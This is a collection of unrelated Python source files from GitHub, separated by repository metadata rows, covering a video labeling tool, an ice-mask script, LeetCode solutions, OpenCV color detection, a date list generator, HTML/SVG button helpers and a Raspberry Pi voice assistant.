        # NOTE(review): 81-86 are raw cv2.waitKey codes for arrow/page keys
        # on some platforms — verify they match the deployment environment.
        key = cv2.waitKey(1) & 0xFF
        if key == 255:
            return True
        if key == 27:
            return False  # ESC
        if key == ord(" "):
            self.paused = not self.paused
        elif key == ord("g"):
            self.quality = "good"
        elif key == ord("r"):
            self.quality = "risk"
        elif key == ord("t"):
            self.quality = "junk"
        elif key == ord("c"):
            self.quality = None
        elif key == ord("s"):
            self.save_labels()
        elif key == 82:
            self.seek(self.frame_id + 10)  # up
        elif key == 84:
            self.seek(self.frame_id - 10)  # down
        elif key == 81:
            self.seek(self.frame_id - 1)  # left
        elif key == 83:
            self.seek(self.frame_id + 1)  # right
        elif key == 85:
            self.config["camera"]["pitch"] -= 0.1  # page up
            self.config_changed = True
        elif key == 86:
            self.config["camera"]["pitch"] += 0.1  # page down
            self.config_changed = True
        elif ord("1") <= key <= ord("5"):
            # Keys 1..5 jump to 0%, 25%, 50%, 75%, 100% of the recording.
            self.seek(int(self.n_frames * (key - ord("0") - 1) / 4))
        elif key != 255:
            print("Unknown key press: [%s]" % key)
        self.show = True
        return True
    def frame_pos(self, frame_id):
        """Position of current camera frame on the horizontal status bars"""
        return min(self.f_w - 1, int(frame_id / self.n_frames * self.f_w))
    def run(self):
        """Run the labeling program in a forever loop until the user quits"""
        self.display()
        while True:
            if not self.paused:
                self.show = self.seek()
            if self.show:
                self.display()
                self.show = False
            if not self.handle_keyboard_input():
                break
            time.sleep(0.01)
def main():
    """Parse CLI args, default to recordings lacking quality labels, run the labeler.

    Fix: the help text for key 4 claimed "25% in"; handle_keyboard_input maps
    keys 1-5 to (key-1)/4 of the recording, so key 4 jumps to 75%.
    """
    print(
        """
This labeling tool interpolates the data based on camera frames and then lets you label each.
To exit press ESCAPE
To save press s
To navigate between frames:
    Left/Right: move in 1 frame increments
    Up/Down: move in 10 frame increments
    1: goes to beginning
    2: goes to 25% in
    3: goes to 50% in
    4: goes to 75% in
    5: goes to end
To adjust horizon line press PAGE_UP or PAGE_DOWN
To change the quality label of this frame
    g: good (use for training)
    r: risk (advanced situation not suitable for classic training)
    t: junk (don't use this part of the video, aka trash)
    c: clear, as in don't change the quality label
    """
    )
    parser = argparse.ArgumentParser()
    parser.add_argument("paths", type=Path, nargs="*", metavar="N", help="recording path location")
    parser.add_argument("--scale", type=float, default=1.0, help="frame rescale ratio")
    args = parser.parse_args()
    if not args.paths:
        # Default: every recording that does not yet have quality labels.
        recordings = (derp.util.DERP_ROOT / "recordings").glob("recording-*")
        args.paths = [r for r in recordings if not (r / "quality.bin").exists()]
    for path in args.paths:
        print("Labeling", path)
        labeler = Labeler(folder=path, scale=args.scale)
        labeler.run()
if __name__ == "__main__":
main()
|
notkarol/derplearning
|
bin/label.py
|
label.py
|
py
| 11,483 |
python
|
en
|
code
| 40 |
github-code
|
6
|
6131848495
|
import numpy as np
from PIL import Image
# Build a binary sea-ice mask from the radar stack and a greyscale template.
radar = np.load('./origin_data/radars_2020-11-01_2022-12-31.npy')
color_image = Image.open('./cool_data/mask.png')
mask = np.array(color_image.convert('L'))
# Vectorised replacement for the original per-pixel Python loops (identical
# result, orders of magnitude faster, and no hard-coded 825x200 dimensions):
# the template mask is 1 where the greyscale value is dark (<= 200), else 0.
mask = (mask <= 200).astype(mask.dtype)
# Threshold every radar frame at 0.53 (1 = ice, 0 = open water) and keep only
# pixels inside the template mask; broadcasting applies the mask per frame.
ice = (radar > 0.53).astype(radar.dtype) * mask
np.save('./cool_data/ice_mask.npy', ice)
|
Ronningen/DDIN1
|
ice_mask_generation.py
|
ice_mask_generation.py
|
py
| 720 |
python
|
en
|
code
| 1 |
github-code
|
6
|
40071013592
|
class Solution:
    def findNthDigit(self, n):
        """Return the n-th digit (1-indexed) of 123456789101112...

        :type n: int
        :rtype: int
        """
        if n <= 9:
            return n
        # Skip whole bands of equal-width numbers: 9 one-digit numbers,
        # 90 two-digit, 900 three-digit, and so on.
        width, band = 1, 9
        while n > width * band:
            n -= width * band
            width += 1
            band *= 10
        first = 10 ** (width - 1)
        number = first + n // width
        offset = n % width
        if offset == 0:
            # n lands exactly on the last digit of the previous number.
            return (number - 1) % 10
        return (number // 10 ** (width - offset)) % 10
def main():
    """Ad-hoc smoke test: print the 10th digit of the sequence."""
    print('Output:', Solution().findNthDigit(10))


if __name__ == '__main__':
    main()
# start*=10
# start+=(n-1)/digit
|
lucy9215/leetcode-python
|
400_NthDigit.py
|
400_NthDigit.py
|
py
| 734 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73510522747
|
class Node:
    """One element of a singly linked list."""

    def __init__(self, val):
        self.val = val
        self.next = None


class MyLinkedList:
    """Singly linked list behind a sentinel node (LeetCode 707)."""

    def __init__(self):
        # The sentinel removes head-insertion special cases.
        self.dummy = Node(-1)

    def get(self, index: int) -> int:
        """Value stored at `index`, or -1 when out of range."""
        pos, node = 0, self.dummy.next
        while node is not None and pos != index:
            node = node.next
            pos += 1
        return -1 if node is None else node.val

    def addAtHead(self, val: int) -> None:
        """Prepend a value."""
        first = Node(val)
        first.next = self.dummy.next
        self.dummy.next = first

    def addAtTail(self, val: int) -> None:
        """Append a value."""
        tail = self.dummy
        while tail.next is not None:
            tail = tail.next
        tail.next = Node(val)

    def addAtIndex(self, index: int, val: int) -> None:
        """Insert before position `index`; no-op when index exceeds the length."""
        pos, prev = 0, self.dummy
        while prev is not None and pos != index:
            prev = prev.next
            pos += 1
        if prev is not None:
            fresh = Node(val)
            fresh.next = prev.next
            prev.next = fresh

    def deleteAtIndex(self, index: int) -> None:
        """Remove the node at `index` when it exists."""
        pos, prev = 0, self.dummy
        while prev is not None and pos != index:
            prev = prev.next
            pos += 1
        if prev is not None and prev.next is not None:
            prev.next = prev.next.next


# Your MyLinkedList object will be instantiated and called as such:
# obj = MyLinkedList()
# param_1 = obj.get(index)
# obj.addAtHead(val)
# obj.addAtTail(val)
# obj.addAtIndex(index,val)
# obj.deleteAtIndex(index)
|
yonaSisay/a2sv-competitive-programming
|
0707-design-linked-list/0707-design-linked-list.py
|
0707-design-linked-list.py
|
py
| 1,616 |
python
|
en
|
code
| 0 |
github-code
|
6
|
7261113141
|
import matplotlib
matplotlib.use('TkAgg')
import cv2
import numpy as np
import time
from matplotlib import pyplot as plt
def main():
    """Pipeline demo: normalize, blur, k-means quantize, threshold the reds,
    clean the mask with morphology, then locate the red object via moments."""
    #img= cv2.imread('primeiroFrame.jpg',0)
    img= cv2.imread('primeiroFrame.jpg',cv2.IMREAD_COLOR)
    print(img.shape)
    # normalize the image contrast (CLAHE)
    img = histogramaNormalizadoColor(img)
    # apply a Gaussian smoothing filter
    img = cv2.GaussianBlur(img,(5,5),0)
    # quantize the colors using k-means:
    img = calculakmeans(img)
    # threshold, keeping only the red hues
    mask = trashholdingVermelho(img)
    # apply closing and opening operations on the mask to remove noise
    retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(50,1))
    openImage = cv2.morphologyEx(mask,cv2.MORPH_CLOSE,retKernel)
    retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(20,10))
    closeImage = cv2.morphologyEx(openImage,cv2.MORPH_OPEN,retKernel)
    retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(5,5))
    openImage = cv2.morphologyEx(closeImage,cv2.MORPH_CLOSE,retKernel)
    # find the blobs:
    #img_blob = deteccaoDeBlobs(openImage)
    # using image moments:
    img_blob = detectMomento(openImage)
    #cv2.imshow("Final",openImage)
    #cv2.imshow("CloseiImage",closeImage)
    #cv2.waitKey(0)
    #cv2.destroyAllWindows()
    #cap.release()
def detectMomento(img):
    """Find contours in a binary image, print the centroid of the last-found
    contour, and display it with a padded bounding box (blocks on keypress)."""
    #img= cv2.imread('untitled.png',0)
    ret,thresh = cv2.threshold(img,125,255,0)
    # NOTE(review): 2-value unpacking matches OpenCV 4.x; OpenCV 3.x returns
    # (image, contours, hierarchy) — verify the installed version.
    countourn, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
    # Reverse so index 0 is the contour findContours returned last.
    countourn = list(reversed(countourn))
    cnt = countourn[0]
    M = cv2.moments(cnt)
    # Centroid from the spatial moments (raises ZeroDivisionError if m00 == 0).
    cx = int(M["m10"]/M["m00"])
    cy = int(M["m01"]/M["m00"])
    print(cx)
    print(cy)
    x,y,w,h = cv2.boundingRect(countourn[0])
    cv2.rectangle(img,(x-10,y-10), (x+w+10,y+h+10),(255,255,255),1)
    cv2.imshow("img_contours", img)
    cv2.waitKey(0)
    """ for c in countourn:
        M = cv2.moments(c)
        cx = int(M["m10"]/M["m00"])
        cy = int(M["m01"]/M["m00"])
        cv2.circle(img, (cX, cY), 5, (255, 255, 255), -1)
        cv2.imshow("img_contourn", img)
    print(countourn)
    cv2.drawContours(img, countourn, -1, (0,255,0), 3)
    cv2.imshow("img_contours", img)
    cv2.waitKey(0) """
def deteccaoDeBlobs(img):
    """Detect white blobs with SimpleBlobDetector and display the image with
    the last-detected keypoint drawn on it (blocks on a key press)."""
    #img= cv2.imread('untitled.png',cv2.IMREAD_GRAYSCALE)
    params = cv2.SimpleBlobDetector_Params()
    #img = cv2.bitwise_not(img)
    params.minDistBetweenBlobs = 10
    params.filterByColor = True
    params.blobColor = 255
    params.filterByCircularity = False
    params.filterByConvexity = False
    params.filterByInertia = False
    params.filterByArea = True #
    params.minArea = 1 #
    params.maxArea = 100000 #
    # Create a detector with the parameters
    ver = (cv2.__version__).split('.')
    if int(ver[0]) < 3 :
        detector = cv2.SimpleBlobDetector(params)
    else :
        detector = cv2.SimpleBlobDetector_create(params)
    keypoints = detector.detect(img)
    print(type(keypoints))
    keypoints = list(reversed(keypoints))
    #np.invert(keypoints)
    # Draw only the first keypoint of the reversed list (loop breaks early).
    for i in keypoints:
        im_with_keypoints = cv2.drawKeypoints(img, [i], np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
        print("################")
        print(i.class_id)
        print(i.pt)
        objectCentroid = i.pt
        print("################")
        break
    black = np.zeros((540,960,3))
    #print(im_with_keypoints.size)
    #im_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
    # NOTE(review): im_with_keypoints is unbound when no blob was detected,
    # so the imshow below raises NameError — guard against empty keypoints.
    cv2.imshow("Keypoints", im_with_keypoints)
    cv2.waitKey(0)
def trashholdingVermelho(colorImage):
    """Return a binary mask of the red pixels of a BGR image.

    Two HSV hue ranges (0-10 and 170-180) are combined because red sits at
    both ends of the hue axis.
    """
    # convert to HSV
    hsv = cv2.cvtColor(colorImage, cv2.COLOR_BGR2HSV)
    lower_red = np.array([0,70,50])
    upper_red = np.array([10,255,255])
    mask1 = cv2.inRange(hsv,lower_red,upper_red)
    lower_red = np.array([170,70,50])
    upper_red = np.array([180,255,255])
    mask2 = cv2.inRange(hsv,lower_red,upper_red)
    mask = mask1 | mask2
    # res (masked color image) is computed but only the mask is returned.
    res = cv2.bitwise_and(colorImage,colorImage, mask = mask)
    #cv2.imshow('frame',colorImage)
    #cv2.imshow('mask',mask)
    #cv2.imshow('res',res)
    return mask
def calculaHistogramaColor(colorImage):
    """Plot the per-channel (B, G, R) histogram of a color image."""
    color = ('b','g','r')
    for i,col in enumerate(color):
        print("passei")
        histr = cv2.calcHist(colorImage,[i],None,[255],[0,255])
        plt.plot(histr,color = col)
        plt.xlim([0,255])
    plt.show()
def calculaHistograma(greyImage):
    """Plot the histogram of a greyscale image (caller must invoke plt.show())."""
    histr = cv2.calcHist(greyImage,[0],None,[255],[0,256])
    plt.plot(histr,)
    plt.xlim([0,255])
def histogramaNormalizadoColor(ColorImg):
    """Contrast-normalize a BGR image by applying CLAHE to the L channel in LAB space."""
    lab = cv2.cvtColor(ColorImg, cv2.COLOR_BGR2LAB)
    lab_planes = cv2.split(lab)
    clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8,8))
    lab_planes[0] = clahe.apply(lab_planes[0])
    lab = cv2.merge(lab_planes)
    bgr = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR)
    return bgr
#Contrast Limited Adaptive Histogram Equalization
# create a CLAHE object (Arguments are optional).
def histogramaNormalizadoCinza(img):
    """Contrast-normalize a greyscale image with CLAHE and return the result.

    Fixes a NameError in the original, which applied CLAHE to an undefined
    name `image` instead of the `img` parameter.
    """
    clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
    return clahe.apply(img)
def calculakmeans(img):
    """Color-quantize an image to K=15 clusters using cv2.kmeans."""
    # One row per pixel, 3 columns (BGR); cv2.kmeans requires float32 input.
    z = img.reshape((-1,3))
    z = np.float32(z)
    # Stop after 10 iterations or when centers move less than epsilon 1.0.
    criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
    K=15
    ret, label,center = cv2.kmeans(z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)
    center = np.uint8(center)
    # Replace every pixel with its cluster center, then restore the shape.
    res = center[label.flatten()]
    res2= res.reshape((img.shape))
    return res2
if __name__ == "__main__":
main()
|
felipemateus/vis-oCompEstudo
|
histogram.py
|
histogram.py
|
py
| 5,685 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37958731395
|
import sys
from datetime import datetime
class DateGenerator:
    """Print every day/month combination for a range of years (wordlist style).

    Days always run 1..31 for every month, so impossible dates such as
    Feb 30 are emitted too; this mirrors the original behaviour.
    """

    def __init__(self, starting, ending, display, separator):
        """starting/ending: year bounds (end exclusive). display: '0' = ymd,
        '1' = dmy, '2' = mdy. separator: string placed between the fields.
        Generation starts immediately on construction."""
        self.__year_range = range(int(starting), int(ending))
        self.__display = display
        self.__separator = separator
        # Dispatch table mapping the display code to a formatter method.
        self.__display_array = {
            '0': self.ymd,
            '1': self.dmy,
            '2': self.mdy
        }
        self.generate_date()

    def generate_date(self):
        """Emit one formatted line per (year, month, day) combination."""
        months = range(1, 13)
        days = range(1, 32)
        for year in self.__year_range:
            for month in months:
                for day in days:
                    self.__display_array[self.__display](year, month, day)

    def ymd(self, year, month, day):
        """Print year<sep>month<sep>day with zero-padded month/day."""
        print(str(year) + self.__separator + "{:02d}".format(month) + self.__separator + "{:02d}".format(day))

    def dmy(self, year, month, day):
        """Print day<sep>month<sep>year with zero-padded day/month.

        Fixed for consistency: the original ignored the separator and did not
        zero-pad, unlike ymd/mdy (e.g. it printed '112020' for Jan 1 2020).
        """
        print("{:02d}".format(day) + self.__separator + "{:02d}".format(month) + self.__separator + str(year))

    def mdy(self, year, month, day):
        """Print month<sep>day<sep>year with zero-padded month/day."""
        print("{:02d}".format(month) + self.__separator + "{:02d}".format(day) + self.__separator + str(year))
def main():
    """Dispatch on argument count: 3 args run without a separator, 4 args
    include one, anything else prints usage."""
    argc = len(sys.argv)
    if argc == 4:
        DateGenerator(sys.argv[1], sys.argv[2], sys.argv[3], "")
    elif argc == 5:
        DateGenerator(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
    else:
        print(
            "args:\n\t1: starting year\n\t2: ending year\n\t3: display format\n\t\t0 = yyyymmdd\n\t\t1 = ddmmyyyy\n\t\t2 = mmddyyyy\n\t3: optional separator added in between")
if __name__ == '__main__':
main()
|
vjgiri/date
|
dateext.py
|
dateext.py
|
py
| 1,356 |
python
|
en
|
code
| 0 |
github-code
|
6
|
24535937994
|
# html
def create_html(header, body):
    """Wrap head and body markup in a minimal HTML5 document."""
    return ('<!DOCTYPE html>'
            f'<html><head>{header}</head>'
            f'<body>{body}</body>'
            '</html>')
# link
def add_ttf_font(location, name):
    """Return a <style> block declaring a TrueType @font-face."""
    return (
        '<style>'
        '@font-face {'
        f'font-family:{name};'
        f"src: url({location}) format('truetype');"
        '}'
        '</style>'
    )
def add_css(location):
    """Return a stylesheet <link> tag for the given href."""
    return f'<link rel="stylesheet" type="text/css" href="{location}"/>'
def add_js(location):
    """Return a <script> tag sourcing the given JavaScript file."""
    return f'<script type="text/javascript" src="{location}"></script>'
# svg stuff
def add_title(title):
    """Return a <title> element with the given text."""
    return f"<title>{title}</title>"
def add_style(style_dict):
    """Render a dict of CSS properties as an inline style="..." attribute."""
    declarations = ''.join(f'{key}:{value}; ' for key, value in style_dict.items())
    return f'style="{declarations}"'
def create_circle(radius, cx, cy, color):
    """Return an SVG <circle> element."""
    return f'<circle r="{radius}" cx="{cx}" cy="{cy}" fill="{color}" />'
def create_polygon(points_list, color):
    """Return an SVG <polygon> element through the given (x, y) points."""
    points = ''.join(f'{x},{y} ' for x, y in points_list)
    return f'<polygon points = "{points}" fill="{color}" />'
def create_smash_svg_text(word, offset_x, offset_y, size, text_length, color):
    """Return two stacked SVG <text> elements: a white-stroked backing layer
    (shifted 1px right) plus the colored foreground, producing the
    'Smash'-style outlined lettering."""
    def layer(x, extra):
        # One <text> element; `extra` carries the stroke attributes, if any.
        return (
            '<text '
            'text-anchor="start" '
            f'x="{x}" '
            f'y="{offset_y}" '
            f'textLength="{text_length}px" '
            f'fill="{color}" '
            'font-family="Edo, Helvetica, Arial" '
            'font-weight="700" '
            f'font-size="{size}px" '
            f'{extra}'
            '>'
            f'{word}'
            '</text>'
        )

    backing = layer(offset_x + 1, 'stroke="#ffffff" stroke-width="5" stroke-linecap="round"')
    foreground = layer(offset_x, '')
    return backing + foreground
def create_smash_button(size_x, size_y, color, background_color = 'rgb(50, 50, 50)', word = None, float_val = None, button_type="standard", onclick=None, new_window=None, offset_up= 0, highlighted=False):
    """Render a slanted 'Smash'-style SVG button as an HTML string.

    button_type: 'standard' (rounded left end), 'reverse' (rounded right end),
    'middle' (parallelogram, no rounded ends) or 'full' (rounded left,
    angled right, full width). onclick navigates in the same tab,
    new_window opens a new one. highlighted draws the outline in `color`
    instead of `background_color`. offset_up nudges the label upward.
    Each shape is layered shadow -> outline -> colored face.
    """
    outline_color = background_color
    shadow_color = background_color
    # for emphasis the shadow or outline is changed to the main color
    #if highlighted:
    #    shadow_color = color
    if highlighted:
        outline_color = color
    html = '<svg style="'
    if float_val:
        html += 'float: ' + float_val + ';'
    html += 'width: ' + str(size_x + 5) + 'px;'
    html += 'height: ' + str(size_y + 5) + 'px;'
    # Wrap the shapes in a <g> that navigates when a click target was given.
    if onclick:
        html += '"><g onclick="window.location.href= \'' + onclick + '\'">'
    elif new_window:
        html += '"><g onclick="window.open(\'' + new_window + '\')">'
    else:
        html += '">'
    # draw button
    if button_type == "standard":
        # add shadow
        html += create_circle(size_y / 2, size_y / 2 + 5, size_y / 2 + 5, shadow_color)
        html += create_polygon([(size_y/2.0 + 5,0 + 5),(size_y/2.0 + 5,size_y + 5),(size_x * 3.0/4 + 5, size_y + 5),(size_x + 5, 0 + 5)], shadow_color)
        # add outline
        html += create_circle(size_y / 2, size_y / 2, size_y / 2, outline_color)
        html += create_polygon([(size_y/2.0,0),(size_y/2.0,size_y),(size_x * 3.0/4, size_y),(size_x, 0)], outline_color)
        # add background with color
        html += create_circle(size_y / 2 - 5, size_y / 2, size_y / 2, color)
        html += create_polygon([(size_y/2.0,5),(size_y/2.0,size_y-5),(size_x * 3.0/4 - 2, size_y-5),(size_x - 12, 5)], color)
    # draw reverse button
    elif button_type == "reverse":
        html += create_circle(size_y / 2, size_x - (size_y / 2) + 5, size_y / 2 + 5, shadow_color)
        html += create_polygon([(0 + 5, size_y + 5), (size_x / 4 + 5, 0 + 5), (size_x - (size_y / 2) + 5, 0 + 5), (size_x - (size_y / 2) + 5, size_y + 5)], shadow_color)
        html += create_circle(size_y / 2, size_x - (size_y / 2), size_y / 2, outline_color)
        html += create_polygon([(0, size_y), (size_x / 4, 0), (size_x - (size_y / 2), 0), (size_x - (size_y / 2), size_y)], outline_color)
        html += create_circle(size_y / 2 - 5, size_x - (size_y / 2), size_y / 2, color)
        html += create_polygon([(12, size_y - 5), (size_x / 4 + 2, 5), (size_x - (size_y / 2) - 5, 5), (size_x - (size_y / 2) - 5, size_y - 5)], color)
    # draw middle type button
    elif button_type == "middle":
        html += create_polygon([(0 + 5, size_y + 5), (size_x / 4 + 5, 0 + 5), (size_x + 5, 0 + 5), (size_x * 3.0 / 4 + 5, size_y + 5)], shadow_color)
        html += create_polygon([(0, size_y), (size_x / 4, 0), (size_x, 0), (size_x * 3.0 / 4, size_y)], outline_color)
        html += create_polygon([(0 + 12, size_y - 5), (size_x / 4 + 2, 0 + 5), (size_x - 12, 0 + 5), (size_x * 3.0 / 4 - 2, size_y - 5)], color)
    # draw large buttons with special values
    elif button_type == "full":
        html += create_circle(size_y / 2, size_y / 2 + 5, size_y / 2 + 5, shadow_color)
        html += create_polygon([(size_y/2.0 + 5, 0 + 5),(size_y/2.0 + 5,size_y + 5),(size_x - size_y + 5, size_y + 5),(size_x + 5, 0 + 5)], shadow_color)
        html += create_circle(size_y / 2, size_y / 2, size_y / 2, outline_color)
        html += create_polygon([(size_y/2.0,0),(size_y/2.0,size_y),(size_x - size_y, size_y),(size_x, 0)], outline_color)
        html += create_circle(size_y / 2 - 5, size_y / 2, size_y / 2, color)
        html += create_polygon([(size_y/2.0,5),(size_y/2.0,size_y-5),(size_x - size_y - 2, size_y-5),(size_x - 12, 5)], color)
    # add words on the front
    if word:
        if button_type == "standard":
            html += create_smash_svg_text(word, (size_y / 2) - 7, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color)
        elif button_type == "reverse":
            html += create_smash_svg_text(word, size_x / 4 - 7, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color)
        elif button_type == "middle":
            html += create_smash_svg_text(word, size_x / 4 - 18, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color)
        elif button_type == "full":
            html += create_smash_svg_text(word, (size_y / 2) - 7, size_y - 10 - offset_up, size_y, size_x - size_y - 20, background_color)
    # add the button ability
    # NOTE(review): the <g> is also opened for new_window, but only closed
    # when onclick is set — the new_window branch emits unbalanced markup.
    if onclick:
        html += "</g>"
    html += "</svg>"
    return html
def generate_navbar(active=None, logged_in=False):
    """Build the fixed-width top navigation bar.

    active: name of the current page; its button is drawn highlighted.
    logged_in: False shows Login/Register, True shows Profile/Unranked/
    Ranked/Logout.
    """
    style_dict = {
        'position': 'relative',
        'top': 0,
        'left': 0,
        'margin-top': '10px',
        'margin-bottom': '10px',
        'margin-right': 'auto',
        'margin-left': 'auto',
        'min-width':'1000px',
        'max-width': '1000px',
        'height': '55px',
    }
    # define the highlighting for the buttons
    smash_highlighted = active == "home" or active == "splash"
    login_highlighted = active == "login"
    logout_highlighted = active == "logout"
    register_highlighted = active == "register"
    profile_highlighted = active == "profile"
    unranked_highlighted = active == "unranked"
    ranked_highlighted = active == "ranked"
    # add the navbar div
    html = '<div '
    html += add_style(style_dict)
    html += '>'
    # add the main button
    html += create_smash_button(195, 50, 'rgb(255, 50, 10)', word = 'Smash', float_val='left', onclick='/', highlighted=smash_highlighted)
    # add the login specific buttons
    if not logged_in:
        html += create_smash_button(195, 50, 'rgb(10, 150, 50)', word = 'Register', float_val='right', button_type="reverse", onclick='/register', highlighted=register_highlighted)
        html += create_smash_button(195, 50, 'rgb(10, 50, 250)', word = 'Login', float_val='right', onclick='/login', highlighted=login_highlighted)
    else:
        html += create_smash_button(195, 50, '#666688', word = 'Logout', float_val='right', button_type="reverse", onclick='/logout', highlighted=logout_highlighted)
        html += create_smash_button(195, 50, '#93D620', word = 'Ranked', float_val='right', button_type="middle", onclick='/ranked', highlighted=ranked_highlighted)
        html += create_smash_button(195, 50, '#169FFA', word = 'Unranked', float_val='right', button_type="middle", onclick='/unranked', highlighted=unranked_highlighted)
        html += create_smash_button(195, 50, '#F2A705', word = 'Profile', float_val='right', button_type="middle", onclick='/profile', highlighted=profile_highlighted)
    html += '</div>'
    return html
def generate_main_div(inner):
    """Wrap `inner` markup in the centred main column plus a styled text
    container, returning the combined HTML string."""
    outer_style = {
        'top': 0,
        'left': 0,
        'position': 'relative',
        'margin-top': '10px',
        'margin-bottom': '10px',
        'margin-left': 'auto',
        'margin-right': 'auto',
        'min-width': '1000px',
        'max-width': '1000px',
    }
    text_style = {
        'font-family': 'Helvetica, Arial',
        'font-weight': '500',
        'font-size': '32px',
        'top': 0,
        'left': 0,
        'position': 'relative',
        'margin-bottom': '10px',
        'margin-left': '10px',
        'margin-right': '10px',
    }
    pieces = [
        '<div id="main_div"', add_style(outer_style), '>',
        '<div id="text_div"', add_style(text_style), '>',
        inner,
        "</div></div>",
    ]
    return ''.join(pieces)
class HTMLPage:
    """Accumulator for a page: header and body fragments are appended
    independently and rendered together by get_html()."""
    # Class-level fallbacks; __init__ rebinds both per instance.
    header = ""
    body = ""
    def __init__(self, page_css=None):
        """Start an empty page styled by `page_css` (default css/basic.css)."""
        self.body = ""
        self.header = add_css(page_css if page_css else 'css/basic.css')
        self.header += add_title("Smashed")
        self.header += add_ttf_font('/font/edosz.ttf', 'Edo')
    def add_header(self, item):
        """Append a fragment to the <head> content."""
        self.header = self.header + item
    def add_body(self, item):
        """Append a fragment to the <body> content."""
        self.body = self.body + item
    def get_html(self):
        """Render the accumulated page as a full HTML document."""
        return create_html(self.header, self.body)
|
dpenning/Sm4shed
|
SmashedLobby/html_helper.py
|
html_helper.py
|
py
| 9,669 |
python
|
en
|
code
| 2 |
github-code
|
6
|
42827733659
|
from global_collection import *
from language_collection import *
from thread_collection import *
from aiy.cloudspeech import CloudSpeechClient
from aiy.board import Board, Led
from alzheimer import *
from assistant_grpc_demo import *
def main():
    """Entry point: set up the voice assistant, start the background alarm and
    network threads, then dispatch recognised speech to worker threads."""
    malddomi = Malddomi()
    # Create the shared worker-task helper.
    thread_instance = AsyncTask()
    # alzheimer_instance = Alzheimer()
    logging.basicConfig(level=logging.DEBUG)
    parser = argparse.ArgumentParser(description='Assistant service example.')
    parser.add_argument('--language', default=locale_language())
    args = parser.parse_args()
    logging.info('Initializing for language %s...', args.language)
    hints = get_hints(args.language)
    client = CloudSpeechClient()
    # Alarm feature runs in the background for the whole session.
    alarm = threading.Thread(target=thread_instance.thread_alarm)
    alarm.start()
    # Network feature likewise runs in the background.
    network = threading.Thread(target=thread_instance.thread_network)
    network.start()
    #
    # createDB = threading.Thread(target=thread_instance.thread_date_create)
    # createDB.start()
    with Board() as board:
        while True:
            if hints:
                logging.info('new_test : Say something, e.g. %s.' % ', '.join(hints))
            else:
                logging.info('new_test : Say something.')
            text = client.recognize(language_code=args.language,
                                    hint_phrases=hints)
            if text is None:
                logging.info('new_test : You said nothing.')
                continue
            logging.info('new_test : You said: "%s"' % text)
            # BUG FIX: the original passed thread_instance.sing(path) (and
            # emergency(msg)) AS the Thread target, which called the method
            # synchronously in this thread and handed its return value to
            # Thread. Pass the callable plus args so the work really runs in
            # a background thread.
            if '임영웅노래틀어 줘' in text:
                sing = threading.Thread(target=thread_instance.sing,
                                        args=('/home/pi/Music/임영웅.mp3',))
                sing.start()
            elif '영탁노래틀어 줘' in text:
                sing = threading.Thread(target=thread_instance.sing,
                                        args=('/home/pi/Music/영탁.mp3',))
                sing.start()
            elif '송가인노래틀어 줘' in text:
                sing = threading.Thread(target=thread_instance.sing,
                                        args=('/home/pi/Music/송가인.mp3',))
                sing.start()
            elif '노래 꺼 줘' in text:
                songstop = threading.Thread(target=thread_instance.songstop)
                songstop.start()
            elif text not in hints and '노래 틀어 줘' in text:
                # Unknown song request: play the "no such song" clip.
                nosong = threading.Thread(target=thread_instance.sing,
                                          args=('/home/pi/Music/nosong.mp3',))
                nosong.start()
            elif '살려 줘' in text:
                emergency = threading.Thread(target=thread_instance.emergency,
                                             args=("현재 아무개씨가 위험한 상황에 빠졌습니다. 신속히 확인 부탁드리겠습니다",))
                emergency.start()
            elif '치매테스트 할게' in text:
                alzheimer = threading.Thread(target=thread_instance.alzheimer_test)
                alzheimer.start()
            elif '말또미' in text:
                malddomi.thread_assistant()
            elif 'goodbye' in text:
                break
if __name__ == '__main__':
    main()
|
YuSunjo/bit_project_hyodol
|
raspberrypi_file/new_test.py
|
new_test.py
|
py
| 3,221 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43627572834
|
from typing import List
class Solution:
    def maxBoxesInWarehouse(self, boxes: List[int], warehouse: List[int]) -> int:
        """Push sorted boxes (largest first) into the warehouse from either
        end, keeping two pointers at the unfilled left/right rooms.
        Note: sorts `boxes` in place, matching the original behaviour."""
        boxes.sort()
        left, right = 0, len(warehouse) - 1
        placed = 0
        idx = len(boxes) - 1
        while idx >= 0:
            box = boxes[idx]
            if box <= warehouse[left]:
                left += 1
                placed += 1
            elif box <= warehouse[right]:
                right -= 1
                placed += 1
            if left > right:
                # Every room is filled.
                break
            idx -= 1
        return placed
    def test(self):
        """Run the method on a few fixed cases and print the results."""
        test_cases = [
            [[1,2,2,3,4], [3,4,1,2]],
            [[3,5,5,2], [2,1,3,4,5]],
            [[1,2,3], [1,2,3,4]],
            [[4,5,6], [3,3,3,3,3]],
        ]
        for boxes, warehouse in test_cases:
            res = self.maxBoxesInWarehouse(boxes, warehouse)
            print('res: %s' % res)
            print('-='*30 + '-')
if __name__ == '__main__':
    Solution().test()
|
MichaelTQ/LeetcodePythonProject
|
solutions/leetcode_1551_1600/LeetCode1580_PutBoxesIntoTheWarehouseII.py
|
LeetCode1580_PutBoxesIntoTheWarehouseII.py
|
py
| 918 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43785018579
|
from __future__ import print_function
import argparse
import sys
import rospy
import os
import numpy as np
from geometry_msgs.msg import Twist
import time
import cv2
import tensorflow as tf
pre_path = os.path.abspath('../')
sys.path.append(pre_path)
from utils import imagezmq
